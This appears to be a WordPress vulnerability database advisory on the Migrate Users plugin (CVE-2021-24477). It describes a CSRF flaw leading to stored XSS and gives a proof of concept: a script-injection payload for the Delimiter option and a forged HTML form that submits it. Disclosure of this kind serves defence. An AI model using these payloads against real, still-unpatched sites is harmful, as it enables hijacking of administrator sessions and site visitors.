WordPress Plugin Vulnerabilities

Migrate Users <= 1.0.1 - CSRF to Stored Cross-Site Scripting (XSS)

Description

The plugin does not sanitise or escape its Delimiter option before outputting in a page, leading to a Stored Cross-Site Scripting issue. Furthermore, the plugin does not have CSRF check in place when saving its options, allowing the issue to be exploited via a CSRF attack.

Proof of Concept

Add the following payload in the Delimiter option of the plugin (/wp-admin/tools.php?page=migrate_users&action=options): "><script>alert(/XSS/)</script>

Via a CSRF attack:

<html>
  <body>
    <form action="https://example.com/wp-admin/tools.php?page=migrate_users&action=options" method="POST">
      <input type="hidden" name="options[delimiter]" value=',"><script>alert(/XSS/)</script>' />
      <input type="hidden" name="options[limit]" value="10" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
migrate-users
No known fix

References

CVE
CVE-2021-24477

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.1 (high)

Miscellaneous

Original Researcher
ABISHEIK M
Submitter
ABISHEIK M
Submitter twitter
abisheikmagesh
Verified
Yes
WPVDB ID
7915070f-1d9b-43c3-b01e-fec35f633a4d

Timeline

Publicly Published
2021-06-28 (about 2 years ago)
Added
2021-06-28 (about 2 years ago)
Last Updated
2022-01-02 (about 2 years ago)

Other

Published
Title
Published
2023-05-09
Title
GTmetrix for WordPress < 0.4.6 - Reflected Cross-Site Scripting
Published
2022-12-28
Title
OneClick Chat to Order < 1.0.4.2 - Contributor+ Stored XSS via Shortcode
Published
2022-02-17
Title
Profile Builder < 3.6.2 - Reflected Cross-Site Scripting
Published
2024-04-05
Title
WP Google Review Slider < 13.6 - Admin+ Stored XSS
Published
2021-12-27
Title
WP User Frontend < 3.5.26 - SQL Injection to Reflected Cross-Site Scripting